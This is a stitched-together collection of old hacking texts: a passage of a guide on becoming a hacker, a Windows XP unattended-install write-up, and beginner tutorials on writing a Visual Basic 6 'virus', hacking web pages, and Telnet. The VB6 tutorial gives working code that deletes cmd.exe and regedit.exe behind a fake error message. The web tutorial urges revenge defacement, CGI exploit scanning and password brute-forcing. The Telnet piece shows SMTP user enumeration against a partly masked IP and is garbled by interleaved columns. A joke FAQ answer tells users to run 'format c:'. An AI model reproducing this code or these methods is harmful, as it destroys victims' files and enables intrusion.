in a general way, independent of any one
language. To be a real hacker, you need to get to
the point where you can learn a new language in
days by relating what's in the manual to what
you already know. This means you should learn
several very different languages.
If you get into serious programming, you will
have to learn C, the core language of Unix. C++
is very closely related to C; if you know one,
learning the other will not be difficult. Neither
language is a good one to try learning as your
first, however. And, actually, the more you can
avoid programming in C the more productive
you will be.
C is very efficient, and very sparing of your
machine's resources. Unfortunately, C gets that
efficiency by requiring you to do a lot of low-
level management of resources (like memory) by
hand. All that low-level code is complex and
bug-prone, and will soak up huge amounts of
your time on debugging. With today's machines
as powerful as they are, this is usually a bad
tradeoff --- it's smarter to use a language that
uses the machine's time less efficiently, but your
time much more efficiently. Thus, Python.
Other languages of particular importance to
hackers include Perl and LISP. Perl is worth
learning for practical reasons; it's very widely
used for active web pages and system
administration, so that even if you never write
Perl you should learn to read it. Many people use
Perl in the way I suggest you should use Python,
to avoid C programming on jobs that don't
require C's machine efficiency. You will need to
be able to understand their code.
LISP is worth learning for a different reason ---
the profound enlightenment experience you will
have when you finally get it. That experience
will make you a better programmer for the rest of
your days, even if you never actually use LISP
itself a lot. (You can get some beginning
experience with LISP fairly easily by writing and
modifying editing modes for the Emacs text
editor.)
It's best, actually, to learn all five of these
(Python, Java, C/C++, Perl, and LISP). Besides
being the most important hacking languages,
they represent very different approaches to
programming, and each will educate you in
valuable ways.
I can't give complete instructions on how to learn
to program here --- it's a complex skill. But I can
tell you that books and courses won't do it
(many, maybe most of the best hackers are self-
taught). You can learn language features --- bits
of knowledge --- from books, but the mind-set
that makes that knowledge into living skill can
be learned only by practice and apprenticeship.
What will do it is (a) reading code and (b)
writing code.
Learning to program is like learning to write
good natural language. The best way to do it is to
read some stuff written by masters of the form,
write some things yourself, read a lot more, write
a little more, read a lot more, write some more -
and repeat until your writing begins to develop
the kind of strength and economy you see in
your models.
Finding good code to read used to be hard,
because there were few large programs available
in source for fledgeling hackers to read and
tinker with. This has changed dramatically;
open-source software, programming tools, and
operating systems (all built by hackers) are now
widely available. Which brings me neatly to our
next topic?
2. Get one of the open-source Unixes
and learn to use and run it.
I'm assuming you have a personal computer or
can get access to one (these kids today have it so
easy :-)). The single most important step any
newbie can take toward acquiring hacker skills is
to get a copy of Linux or one of the BSD-
Unixes, install it on a personal machine, and run
it.
Yes, there are other operating systems in the
world besides Unix. But they're distributed in
binary --- you can't read the code, and you can't
modify it. Trying to learn to hack on a Microsoft
Windows machine or under MacOS or any other
closed-source system is like trying to learn to
dance while wearing a body cast.
Under OS/X it's possible, but only part of the
system is open source --- you're likely to hit a lot
of walls, and you have to be careful not to
develop the bad habit of depending on Apple's
proprietary code. If you concentrate on the Unix
under the hood you can learn some useful things.
Unix is the operating system of the Internet.
While you can learn to use the Internet without
knowing Unix, you can't be an Internet hacker
without understanding Unix. For this reason, the
hacker culture today is pretty strongly Unix-
centered. (This wasn't always true, and some old-
time hackers still aren't happy about it, but the
symbiosis between Unix and the Internet has
become strong enough that even Microsoft's
muscle doesn't seem able to seriously dent it.)
So, bring up a Unix --- I like Linux myself but
there are other ways (and yes, you can run both
Linux and Microsoft Windows on the same
machine). Learn it. Run it. Tinker with it. Talk to
the Internet with it. Read the code. Modify the
code. You'll get better programming tools
(including C, LISP, Python, and Perl) than any
Microsoft operating system can dream of
hosting, you'll have fun, and you'll soak up more
knowledge than you realize you're learning until
you look back on it as a master hacker.
For more about learning Unix, see The
Loginataka. You might also want to have a look
at The Art Of Unix Programming.
To get your hands on a Linux, see the Linux
Online! site; you can download from there or
(better idea) find a local Linux user group to help
you with installation. From a new user's point of
view, all Linux distributions are pretty much
equivalent.
You can find BSD Unix help and resources at
www.bsd.org.
I have written a primer on the basics of Unix and
the Internet.
(Note: I don't really recommend installing either
Linux or BSD as a solo project if you're a
newbie. For Linux, find a local Linux user's
group and ask for help.)
3. Learn how to use the World Wide
Web and write HTML.
Most of the things the hacker culture has built do
their work out of sight, helping run factories and
offices and universities without any obvious
impact on how non-hackers live. The Web is the
one big exception, the huge shiny hacker toy that
even politicians admit is changing the world. For
this reason alone (and a lot of other good ones as
well) you need to learn how to work the Web.
This doesn't just mean learning how to drive a
browser (anyone can do that), but learning how
to write HTML, the Web's markup language. If
you don't know how to program, writing HTML
will teach you some mental habits that will help
you learn. So build a home page. Try to stick to
XHTML, which is a cleaner language than
classic HTML. (There are good beginner
tutorials on the Web; here's one.)
But just having a home page isn't anywhere near
good enough to make you a hacker. The Web is
full of home pages. Most of them are pointless,
zero-content sludge --- very snazzy-looking
sludge, mind you, but sludge all the same (for
more on this see The HTML Hell Page).
To be worthwhile, your page must have content -
-- it must be interesting and/or useful to other
hackers. And that brings us to the next topic?
4. If you don't have functional
English, learn it.
As an American and native English-speaker
myself, I have previously been reluctant to
suggest this, lest it be taken as a sort of cultural
imperialism. But several native speakers of other
languages have urged me to point out that
English is the working language of the hacker
culture and the Internet, and that you will need to
know it to function in the hacker community.
This is very true. Back around 1991 I learned
that many hackers who have English as a second
language use it in technical discussions even
when they share a birth tongue; it was reported to
me at the time that English has a richer technical
vocabulary than any other language and is
therefore simply a better tool for the job. For
similar reasons, translations of technical books
written in English are often unsatisfactory (when
they get done at all).
Linus Torvalds, a Finn, comments his code in
English (it apparently never occurred to him to
do otherwise). His fluency in English has been
an important factor in his ability to recruit a
worldwide community of developers for Linux.
It's an example worth following.
Status in the Hacker Culture
Like most cultures without a money economy,
hackerdom runs on reputation. You're trying to
solve interesting problems, but how interesting
they are, and whether your solutions are really
good, is something that only your technical peers
or superiors are normally equipped to judge.
Accordingly, when you play the hacker game,
you learn to keep score primarily by what other
hackers think of your skill (this is why you aren't
really a hacker until other hackers consistently
call you one). This fact is obscured by the image
of hacking as solitary work; also by a hacker-
cultural taboo (now gradually decaying but still
potent) against admitting that ego or external
validation are involved in one's motivation at all.
Specifically, hackerdom is what anthropologists
call a gift culture. You gain status and reputation
in it not by dominating other people, nor by
being beautiful, nor by having things other
people want, but rather by giving things away.
Specifically, by giving away your time, your
creativity, and the results of your skill.
There are basically five kinds of things you can
do to be respected by hackers:
1. Write open-source software
The first (the most central and most traditional)
is to write programs that other hackers think are
fun or useful, and give the program sources away
to the whole hacker culture to use.
(We used to call these works 'free software', but
this confused too many people who weren't sure
exactly what 'free' was supposed to mean. Most
of us, by at least a 2:1 ratio according to web
content analysis, now prefer the term 'open-
source' software).
Hackerdom's most revered demigods are people
who have written large, capable programs that
met a widespread need and given them away, so
that now everyone uses them.
2. Help test and debug open-source
software
They also serve who stand and debug open-
source software. In this imperfect world, we will
inevitably spend most of our software
development time in the debugging phase. That's
why any open-source author who's thinking will
tell you that good beta-testers (who know how to
describe symptoms clearly, localize problems
well, can tolerate bugs in a quickie release, and
are willing to apply a few simple diagnostic
routines) are worth their weight in rubies. Even
one of these can make the difference between a
debugging phase that's a protracted, exhausting
nightmare and one that's merely a salutary
nuisance.
If you're a newbie, try to find a program under
development that you're interested in and be a
good beta-tester. There's a natural progression
from helping test programs to helping debug
them to helping modify them. You'll learn a lot
this way, and generate good karma with people
who will help you later on.
3. Publish useful information
Another good thing is to collect and filter useful
and interesting information into web pages or
documents like Frequently Asked Questions
(FAQ) lists, and make those generally available.
Maintainers of major technical FAQs get almost
as much respect as open-source authors.
4. Help keep the infrastructure
working
The hacker culture (and the engineering
development of the Internet, for that matter) is
run by volunteers. There's a lot of necessary but
unglamorous work that needs done to keep it
going --- administering mailing lists, moderating
newsgroups, maintaining large software archive
sites, developing RFCs and other technical
standards.
People who do this sort of thing well get a lot of
respect, because everybody knows these jobs are
huge time sinks and not as much fun as playing
with code. Doing them shows dedication.
5. Serve the hacker culture itself
Finally, you can serve and propagate the culture
itself (by, for example, writing an accurate
primer on how to become a hacker :-)). This is
not something you'll be positioned to do until
you've been around for while and become well-
known for one of the first four things.
The hacker culture doesn't have leaders, exactly,
but it does have culture heroes and tribal elders
and historians and spokespeople. When you've
been in the trenches long enough, you may grow
into one of these. Beware: hackers distrust
blatant ego in their tribal elders, so visibly
reaching for this kind of fame is dangerous.
Rather than striving for it, you have to sort of
position yourself so it drops in your lap, and then
be modest and gracious about your status.
The Hacker/Nerd Connection
Contrary to popular myth, you don't have to be a
nerd to be a hacker. It does help, however, and
many hackers are in fact nerds. Being a social
outcast helps you stay concentrated on the really
important things, like thinking and hacking.
For this reason, many hackers have adopted the
label 'nerd' and even use the harsher term 'geek'
as a badge of pride --- it's a way of declaring
their independence from normal social
expectations. See The Geek Page for extensive
discussion.
If you can manage to concentrate enough on
hacking to be good at it and still have a life,
that's fine. This is a lot easier today than it was
when I was a newbie in the 1970s; mainstream
culture is much friendlier to techno-nerds now.
There are even growing numbers of people who
realize that hackers are often high-quality lover
and spouse material.
If you're attracted to hacking because you don't
have a life, that's OK too --- at least you won't
have trouble concentrating. Maybe you'll get a
life later on.
Points For Style
Again, to be a hacker, you have to enter the
hacker mindset. There are some things you can
do when you're not at a computer that seem to
help. They're not substitutes for hacking (nothing
is) but many hackers do them, and feel that they
connect in some basic way with the essence of
hacking.
 • Learn to write your native language
well. Though it's a common stereotype
that programmers can't write, a
surprising number of hackers (including
all the most accomplished ones I know
of) are very able writers.
• Read science fiction. Go to science
fiction conventions (a good way to meet
hackers and proto-hackers).
• Study Zen, and/or take up martial arts.
(The mental discipline seems similar in
important ways.)
• Develop an analytical ear for music.
Learn to appreciate peculiar kinds of
music. Learn to play some musical
instrument well, or how to sing.
• Develop your appreciation of puns and
wordplay.
The more of these things you already do, the
more likely it is that you are natural hacker
material. Why these things in particular is not
completely clear, but they're connected with a
mix of left- and right-brain skills that seems to
be important; hackers need to be able to both
reason logically and step outside the apparent
logic of a problem at a moment's notice.
Work as intensely as you play and play as
intensely as you work. For true hackers, the
boundaries between "play", "work", "science"
and "art" all tend to disappear, or to merge into a
high-level creative playfulness. Also, don't be
content with a narrow range of skills. Though
most hackers self-describe as programmers, they
are very likely to be more than competent in
several related skills --- system administration,
web design, and PC hardware troubleshooting
are common ones. A hacker who's a system
administrator, on the other hand, is likely to be
quite skilled at script programming and web
design. Hackers don't do things by halves; if they
invest in a skill at all, they tend to get very good
at it.
Finally, a few things not to do.
• don't use a silly, grandiose user ID or
screen name.
• don't get in flame wars on Usenet (or
anywhere else).
• don't call yourself a 'cyberpunk', and
don't waste your time on anybody who
does.
• don't post or email writing that's full of
spelling errors and bad grammar.
The only reputation you'll make doing any of
these things is as a twit. Hackers have long
memories --- it could take you years to live your
early blunders down enough to be accepted.
The problem with screen names or handles
deserves some amplification. Concealing your
identity behind a handle is a juvenile and silly
behavior characteristic of crackers, warez d00dz,
and other lower life forms. Hackers don't do this;
they're proud of what they do and want it
associated with their real names. So if you have a
handle, drop it. In the hacker culture it will only
mark you as a loser.
Other Resources
Peter Seebach maintains an excellent Hacker
FAQ for managers who don't understand how to
deal with hackers. If Peter's site doesn't respond,
the following Excite search should find a copy.
There is a document called How To Be A
Programmer that is an excellent complement to
this one. It has valuable advice not just about
coding and skillsets, but about how to function
on a programming team.
I have also written A Brief History Of
Hackerdom.
I have written a paper, The Cathedral and the
Bazaar, which explains a lot about how the
Linux and open-source cultures work. I have
addressed this topic even more directly in its
sequel Homesteading the Noosphere.
Rick Moen has written an excellent document on
how to run a Linux user group.
Rick Moen and I have collaborated on another
document on How To Ask Smart Questions. This
will help you seek assistance in a way that makes
it more likely that you will actually get it.
If you need instruction in the basics of how
personal computers, Unix, and the Internet work,
see The Unix and Internet Fundamentals
HOWTO.
When you release software or write patches for
software, try to follow the guidelines in the
Software Release Practice HOWTO.
If you enjoyed the Zen poem, you might also like
Rootless Root: The Unix Koans of Master Foo.
Frequently Asked Questions
Q:
Will you teach me how to hack?
A:
Since first publishing this page, I've gotten
several requests a week (often several a day)
from people to "teach me all about hacking".
Unfortunately, I don't have the time or energy to
do this; my own hacking projects, and traveling
as an open-source advocate, take up 110% of my
time.
Even if I did, hacking is an attitude and skill you
basically have to teach yourself. You'll find that
while real hackers want to help you, they won't
respect you if you beg to be spoon-fed
everything they know.
Learn a few things first. Show that you're trying,
that you're capable of learning on your own.
Then go to the hackers you meet with specific
questions.
If you do email a hacker asking for advice, here
are two things to know up front. First, we've
found that people who are lazy or careless in
their writing are usually too lazy and careless in
their thinking to make good hackers --- so take
care to spell correctly, and use good grammar
and punctuation, otherwise you'll probably be
ignored. Secondly, don't dare ask for a reply to
an ISP account that's different from the account
you're sending from; we find people who do that
are usually thieves using stolen accounts, and we
have no interest in rewarding or assisting
thievery.
Q:
How can I get started, then?
A:
The best way for you to get started would
probably be to go to a LUG (Linux user group)
meeting. You can find such groups on the LDP
General Linux Information Page; there is
probably one near you, possibly associated with
a college or university. LUG members will
probably give you a Linux if you ask, and will
certainly help you install one and get started.
Q:
When do you have to start? Is it too late for me
to learn?
A:
Any age at which you are motivated to start is a
good age. Most people seem to get interested
between ages 15 and 20, but I know of
exceptions in both directions.
Q:
How long will it take me to learn to hack?
A:
That depends on how talented you are and how
hard you work at it. Most people can acquire a
respectable skill set in eighteen months to two
years, if they concentrate. don't think it ends
there, though; if you are a real hacker, you will
spend the rest of your life learning and perfecting
your craft.
Q:
Are Visual Basic or C# good languages to start
with?
A:
If you're asking this question, it almost certainly
means you're thinking about trying to hack under
Microsoft Windows. This is a bad idea in itself.
When I compared trying to learn to hack under
Windows to trying to learn to dance while
wearing a body cast, I wasn't kidding. don't go
there. It's ugly, and it never stops being ugly.
There are specific problems with Visual Basic
and C#; mainly that they're not portable. Though
there are prototype open-source implementations
of these languages, the applicable ECMA
standards don't cover more than a small set of
their programming interfaces. On Windows most
of their library support is proprietary to a single
vendor (Microsoft); if you aren't extremely
careful about which features you use --- more
careful than any newbie is really capable of
being --- you'll end up locked into only those
platforms Microsoft chooses to support. If you're
starting on a Unix, much better languages with
better libraries are available.
Visual Basic is especially awful. Like other
Basics it's a poorly-designed language that will
teach you bad programming habits. No, don't ask
me to describe them in detail; that explanation
would fill a book. Learn a well-designed
language instead.
One of those bad habits is becoming dependent
on a single vendor's libraries, widgets, and
development tools. In general, any language that
isn't fully supported under at least Linux or one
of the BSDs, and/or at least three different
vendors' operating systems, is a poor one to learn
to hack in.
Q:
Would you help me to crack a system, or teach
me how to crack?
A:
No. Anyone who can still ask such a question
after reading this FAQ is too stupid to be
educable even if I had the time for tutoring. Any
emailed requests of this kind that I get will be
ignored or answered with extreme rudeness.
Q:
How can I get the password for someone else's
account?
A:
This is cracking. Go away, idiot.
Q:
How can I break into/read/monitor someone
else's email?
A:
This is cracking. Get lost, moron.
Q:
How can I steal channel op privileges on IRC?
A:
This is cracking. Begone, cretin.
Q:
I've been cracked. Will you help me fend off
further attacks?
A:
No. Every time I've been asked this question so
far, it's been from some poor sap running
Microsoft Windows. It is not possible to
effectively secure Windows systems against
crack attacks; the code and architecture simply
have too many flaws, which makes securing
Windows like trying to bail out a boat with a
sieve. The only reliable prevention starts with
switching to Linux or some other operating
system that is designed to at least be capable of
security.
Q:
I'm having problems with my Windows
software. Will you help me?
A:
Yes. Go to a DOS prompt and type "format c:".
Any problems you are experiencing will cease
within a few minutes.
Q:
Where can I find some real hackers to talk with?
A:
The best way is to find a Unix or Linux user's
group local to you and go to their meetings (you
can find links to several lists of user groups on
the LDP site at ibiblio).
(I used to say here that you wouldn't find any
real hackers on IRC, but I'm given to understand
this is changing. Apparently some real hacker
communities, attached to things like GIMP and
Perl, have IRC channels now.)
Q:
Can you recommend useful books about
hacking-related subjects?
A:
I maintain a Linux Reading List HOWTO that
you may find helpful. The Loginataka may also
be interesting.
For an introduction to Python, see the
introductory materials on the Python site.
Q:
Do I need to be good at math to become a
hacker?
A:
No. While you do need to be able to think
logically and follow chains of exact reasoning,
hacking uses very little formal mathematics or
arithmetic.
In particular, you won't need trigonometry,
calculus or analysis (we leave that stuff to the
electrical engineers :-)). Some grounding in finite
mathematics (including Boolean algebra, finite-
set theory, combinatorics, and graph theory) can
be helpful.
Q:
What language should I learn first?
A:
XHTML (the latest dialect of HTML) if you
don't already know it. There are a lot of glossy,
hype-intensivebad HTML books out there, and
distressingly few good ones. The one I like best
is HTML: The Definitive Guide.
But HTML is not a full programming language.
When you're ready to start programming, I
would recommend starting with Python. You
will hear a lot of people recommending Perl, and
Perl is still more popular than Python, but it's
harder to learn and (in my opinion) less well
designed.
C is really important, but it's also much more
difficult than either Python or Perl. don't try to
learn it first.
Windows users, do not settle for Visual Basic. It
will teach you bad habits, and it's not portable off
Windows. Avoid.
Q:
What kind of hardware do I need?
A:
It used to be that personal computers were rather
underpowered and memory-poor, enough so that
they placed artificial limits on a hacker's learning
process. This stopped being true some time ago;
any machine from an Intel 486DX50 up is more
than powerful enough for development work, X,
and Internet communications, and the smallest
disks you can buy today are plenty big enough.
The important thing in choosing a machine on
which to learn is whether its hardware is Linux-
compatible (or BSD-compatible, should you
choose to go that route). Again, this will be true
for most modern machines. The only real sticky
area is modems; some machines have Windows-
specific hardware that won't work with Linux.
There's a FAQ on hardware compatibility; the
latest version is here.
Q:
I want to contribute. Can you help me pick a
problem to work on?
A:
No, because I don't know your talents or
interests. You have to be self-motivated or you
won't stick, which is why having other people
choose your direction almost never works.
Try this. Watch the project announcements scroll
by on Freshmeat for a few days. When you see
one that makes you think "Cool! I'd like to work
on that!", join it.
Q:
Do I need to hate and bash Microsoft?
A:
No, you don't. Not that Microsoft isn't
loathsome, but there was a hacker culture long
before Microsoft and there will still be one long
after Microsoft is history. Any energy you spend
hating Microsoft would be better spent on loving
your craft. Write good code --- that will bash
Microsoft quite sufficiently without polluting
your karma.
Q:
But won't open-source software leave
programmers unable to make a living?
A:
This seems unlikely --- so far, the open-source
software industry seems to be creating jobs
rather than taking them away. If having a
program written is a net economic gain over not
having it written, a programmer will get paid
whether or not the program is going to be open-
source after it's done. And, no matter how much
"free" software gets written, there always seems
to be more demand for new and customized
applications. I've written more about this at the
Open Source pages.
Q:
How can I get started? Where can I get a free
Unix?
A:
Elsewhere on this page I include pointers to
where to get the most commonly used free Unix.
To be a hacker you need motivation and
initiative and the ability to educate yourself. Start
now?
 How to make your own Windows XP written
I thought about writing up my own experience about customizing
and making an uA (unattended) install of my Windows XP SP2
in the past but kept putting it off thinking no one would even be
interested. Well I recently talked with one of the RMs about nLite
and not long ago posted a bit about it in Software Support then
got a PM asking me about it. So I said to myself why not, maybe
someone will find it useful after all.

First off something like this isn't all that uncommon and an uA
version esp. made for NXS has been around for a while. Think of
this as my own version of that, although I started from zero.

The software I use to make my own version:

nLite (Framework .NET is needed but one (I do) can also use just
the runtimes made esp. for nLite)
Universal Silent Switch Finder (simplifies the task of finding out
which installer a certain application uses)
And of course Windows XP Pro with SP2 already slipstreamed.

I make a folder named XPCD on my HDD and copy the content

of the XP SP2 CD there. I also make two additional folders,
Drivers in which I put all the drivers I'll be integrating and
$OEM$ which is where all my additional tweaks, programs,...
are. For some additional information about $OEM$ folders and
their structure take a look at
http://unattended.msfn.org/global/oemfolders.htm

Open up nLite and am presented with these options (all of which

except the “Integrate a Service Pack” I check, I obviously don't
have any need for that):

Of course everyone has different needs and will remove

Proceed by clicking next then I browse to my XPCD folder and
the fun starts.
“Remove Components” is next up. There I obviously, well start
removing components that I don't need and end up with
something like this:
accordingly, or not remove anything at all.
A couple explanations:
- I leave Outlook Express only because I frequently use
.mht files and removing Outlook Express breaks support
for them.
- I remove everything that is related to the Security
Center, firewall. I don't need that since I'm using Kerio
Personal Firewall and don't need an extra service
running (and taking up the space) just to tell me my
firewall, anti virus and Automatic Updates are On/Off.
- Search Assistant is needed in my case because I have
set up the search in XP exactly to my liking.
- the reason I leave NetShell Cmd-Tool is because in my uA
install I remove the DHCP service and use static IPs. That
tool does not only let me do that but let's me set my subnet
mask, default gateway and DNS server addresses. Meaning
once the install is complete I am online and joined to a
workgroup (check “Unattended Setup” “Personal” tab for
more details) immediately. BTW if anyone has a need to
change their TCP/IP settings and doesn't want to reboot, this
tool often comes in handy.
- I also remove OOBE when dealing with Corporate versions
of XP.
There are others I leave/remove for peculiar reasons but the
above are most common.
Next up is “Unattended Setup” which lets you set personal
settings in advance.
It lets you integrate various drivers. I for one integrate the
drivers for my onboard sound card, both my NICs, SMBus
and SATA. Once the SATA drivers are integrated there's
no need to press F6 when installing all in the spirit of
making it an uA install.
Next there's the “Integrate Hotfixes” feature. It basically
lets you slipstream all the hotfixes you see fit with
Windows. That way when you install Windows you're
installing a more secure version, no need to go to
Windows Update right away.
The hotfixes and instructions are available on RyanVM's
Windows XP Post-SP2 Update Pack page
http://www.ryanvm.net/msfn/updatepack.html

Clicking next takes us to “Options and Tweaks”.

It's pretty self explanatory but this is what I do here:

- “Information” tab I check Unattended Installation.
- “General 1/2” tab I put in the CD-Key, switch Unattended
Mode to FullUnattended and check Classic Theme (would
end up with a classic one in any case since it's one of those
services I remove).
- “General 2/2” is untouched by me.
- “Personal” tab I put in my Full Name, Computer Name,
Workgroup, Language and Timezone. Just in case anyone is
wondering I create an admin password once my XP install is
complete.
- “Display” tab I pick my desired color depth, screen
resolution and refresh rate.
Moving forward there's the “Integrate Drivers” feature
There are several tweaks available there all I can say is
read up on them and use the ones you find useful. I might
also add that I use a regtweaks.reg file in addition to the
tweaks available here. That file has numerous other tweaks
I use in it.
After all is done I get this:
A much reduced version (only 218,29MB big) of
Windows XP that does everything I want it to do.
This is the end of nLite, I only on occasion use it to
make an .iso but not before I copy the $OEM$ folder
into the XPCD one. I say on occassion because I
usually use CDIMAGE which is neatly integrated into
my context menu.
I'm attaching a programs.txt file with all the programs
which are silently installed (or don't need to be
installed) and which I'm currently using in my uA
version (not all of the programs are the latest version,
I'm aware of that, they will be in my next uA install).
There are numerous other things I do to customize my
uA XP but will only mention a few.
Once the install completes I have my FTP and HTTP
servers up and running in full working order. The FTP
server comes with all the settings, users. My HTTP
server comes not only with all the files I want to share
with the rest but with PHP, ASP, Perl, coppermine,
phpMyAdmin and some additional features.
My TightVNC server runs on a predefined port and has
it's password set.
Miranda IM has all of my contacts and is also
automatically connected online.
I add/remove various things to my Windows Explorer
context menu, adjust all of it's icons in addition I label
all my HDD partitions, tweak my QuickLaunch, Start
menu, desktop and general appearance, the hot keys on
my Microsoft keyboard are set precisely how I want
them to be, mIRC comes with all the scripts and
connects to all the networks/channels,...
As I said before I remove a lot of components and
among them are also services, for which I also specify if
they are on automatic, manual, disabled. Here's how
they look at first boot of Windows.

As you might have noticed by looking at that

programs.txt I'm using a lot of F/OSS (free/open
source software). With these exceptions:
- Beyond Compare: haven't found a better alternative
to it yet, well a free one. There are actually quite a few
available but none has the context integration this one
offers, so I'm still looking.
- mIRC: have bought a copy.
- Nero: am using an OEM version.
- PhotoStitch: am also using an OEM version.

I really don't use any other program with the

exception of Photoshop/Imageready which I don't
install uA since they take up too much space. I might
also note that using GIMP as an alternative just won't
do for me.
So out of all the software I need and actually use two
are unpaid for, yes I have a couple of legit XP copies.

The switches for silently installing all those

applications are quite easily available and USSF will This is a "short" description of my uA/customised
also help you out quite a bit there. Windows XP SP2. I may or may not add more in the
Before I have to install Windows again I always future.
update the programs and some of the settings. For
example I also update my Thunderbird profile folder To be shure check: http://ccucu.com
so it includes the latest address book and all e-mails I
need. Same with Firefox, I make sure all my latest
bookmarks, settings and the latest versions of
extensions are included.
 Visual Basic 6 – Creating a Simple Virus
Now many of you feel that creating a virus is
impossible especially for you beginners. Well
this tutorial shows you how to create a simple
virus with just a few lines of code. A virus can
be an application that deletes files upon request,
this is seen as infecting your computer because
by deleting key files you may need to take action
to get your computer back to normal.
First of all open a new Visual Basic project, a
standard exe file..
Now it depends on how you want your virus to
work, I feel it is best if it is activated once your
application is opened so the main code codes in
the form load sub.
On your project insert a text box , a command
button and a timer, we will be using the
command button and timer a little later on.
In the project put in the file you want to delete,
for example if you wanted to delete the
command file then you would put the following
code in the form load tab.
Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub
Once the project is opened then the command
file will be removed.
Now I will show you an example of doing this
using a command button. Put the following code
in the command button and in the form load.
You can even give the text box a name to make it
quicker. I have labelled it ‘A’
Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub
Now once the command button is clicked on the
project the command file will be deleted.
Now we will use the timer in this one. If you
want to disguise your scheme then this is a good
way to do it, Here we will send a fake message
error pretending the application hasn’t got
enough memory to run, but in actual fact the
victim doesn’t know that you have just removed
their command file.
Here is to go about it…
Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub
All we have done above is made the form
invisible so that it makes the error message look
real, we have set an interval of 5 seconds on the
timer before the file is deleted and that’s how
simple it can be to fool someone.
Right, we can now make it a little more difficult
if you are finding the above a little too easy.
How about removing more than 1 file, well this
is how you could go about doing that, we will
stick with the message box fool because I think
that works well.
The example below shows how to remove the
files when the application is loaded, we will not
be using timers or command buttons in this one.
We will not even be using text boxes because
they are not needed, you can just do what is
shown below.
So in the form load part put the following code.
Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub
So above we will be removing the command file
and the registry, I don’t think the victim will be
best pleased about that do you.
Now I have shown you the above information I
think it’s your turn to try and create your own,
now you can test it on your own pc, just copy a
file, lets say the cmd.exe file and paste it into
your C:/
Then put in the code above but in the Kill put
this…
Kill “C:/cmd.exe”
That’s all you need to kill, then you will see the
file has been removed. Keep trying new things
like I have shown and you will be a pro in no
time.
Hacking a
webpage
This is just an intro tutorial to web page hacking
made for newbies !
1)Intro
First of all,why you want to hack a webpage?Is it
a certain webpage or any site at all? There are
many reasons to hack a website, or a
webmaster.Maybe you want to take a revenge or
maybe you want to have fun or just learn how to
do it ! You can deface the website which means
replace the original index with a new one or you
can gain access to the member area of the site
which might be easier.
2)DEFACE:You can deface the site through
telnet or your browser by running remote
commands on an old or misconfigured server,
the hard thing to do is find an old server , maybe
a network of a school or university would do,get
a CGI BUG searcher.This program will scan
ranges of IPs for web-servers and will scan them
for known bugs in their cgis or other bugs and
holes.You can learn how to exploite a certain
hole by adding in yahoo the name of the
bug/hole and the word exploit,search for
"cmd.exe exploit".There are more than 700 holes
that many servers might have! You can also
deface a website by finding the ftp password and
just browse through the sites ftp and replace the
index.htm.You do that with the :
3)BRUTE FORCE ATTACK :To do that you
need a brute forcer or brute force attacker and
some word lists,the brute forcer sends multiple
user/pass requests of words that picks up from
namelists and tries to hack the account untill it
does! So lets say imagine a porn site that asks for
a password , you go there you copy their address
, you add the address in a program called brute
forcer and then from the brute forcer you choose
a text file with names to be used as usernames
and a text with names to be used as
passwords,the brute forcer will try untill it finds
a correct user/pass This should be easier for the
newbies than exploiting cgi bugs , many of the
newbies havent even heard of it i hope i didnt
confuse you with this tutorial there might be
more tuts about web hacking and cgi bugs and
such.Till then try to find the way to cgi bugs
yourself with the cgi scanners in the Web Hacks
section or download a brute forcer to crack
accounts.
Telnet - A Tutorial
to Telnet and
Hacking
Port 25 is the 'Sendmail Protocol' port. We will
be dealing with this port as well.
Telnet Security
Because there are so many problems with Telnet
today involving cyber crime and hacking,
SysAdmins often restrict anonymous use of their
sys's Telnet Proxies. This is cheap and can be
bypassed easily.
Most SysAdmins are amatures at what they do
and make me laugh. They restrict the Telnet
proxies on port 23 and think that we can't telnet
to other ports such as 81 and 25 because we can't
use the Telnet Proxy. Well they are wrong. We
can easily do it and we will. Let me point out a
system that has this and was not effective. I will
star out the IP for privacy.

Welcome to Microsoft Telnet. Telnet32.exe.

o
<to> 202.232.**.**
connecting to 202.232.**.** 23 (The port
number)
Connected.
Now you may be looking at this going, "What
Connection to host lost (unauthorized use of
the hell is Telnet?". If you are, don't worry, I'll
Telnet Proxy(ies).
explain everything. First of all, Telnet is
o
software that allows you to connect to another
<to> 202.232.**.** 25
Telnet Host.
Connecting to 202.232.**.** 25 (Watch this..)
Welcome to ********.net Sendmail Program.
In windows systems Telnet is usually called Welcome to all staff.
Telnet32.exe or Telnet.exe. In newer versions of vrfy bin
windows it is Telnet32.exe. ..550 <bin@********.net>
*** Note to Windows XP users: Don't go and get vrfy sys
the old version of Telnet, because you have a ..550 <sys@********.net>
DOS-Based one. I'll give commands along this vrfy root
guide so you can enjoy it too. You have to either ..550 <root********.net>
run "Telnet" or "cmd" and then "Telnet". vrfy admin
..550 <admin@********.net>
Telnet is not illegal and is used by thousands of vrfy games
remote computers to interchange data, share ..550 <games@********.net>
connections, and do many other things that vrfy uucp
would be impossible without it. ..550 <uucp@********.net>
q
The default port for Telnet is port 23. When I say ..550 <command not recognized>
for instance, 'Connect to the sys' I am referring to c
connecting on the system's default port for Connection to host lost on command.
Telnet. Sometimes you can't determine a port so
you will have to port scan a sys to find the Telnet Ok people is there a problem there? How many
Ports. addys did I get? Am I supposed to have those?
Do I care? No. I am just demonstrating how
sh1tty Unix-System security is and how easy it is
to use the Telnet Proxy to your advantage. Here,
I wil list some commands for all of you running
under DOS.
C - Close the Current Connection
D - Display the sys's operating paremeters
O - Connect to a host name (on default port 23)
[port]
q - Quit (Exit Telnet).
Set- Set Options
Send - Send data/strings to server
Telnet, as you know so far, is a very useful tool
for hackers. Hell, if you can't connect to a
computer, you can't hack it. Its that simple.
Now the best thing about Telnet is that virtually
every Windows computer has it, comes with it,
and is able to run it.
THINGS GOING WRONG ON HACKING OR
TELNET
I have a Windows 98 computer and I am running
Telnet. It gives me a lot more options when
connecting to a computer, and these commands
don’t go anywhere! What do I do? I get the
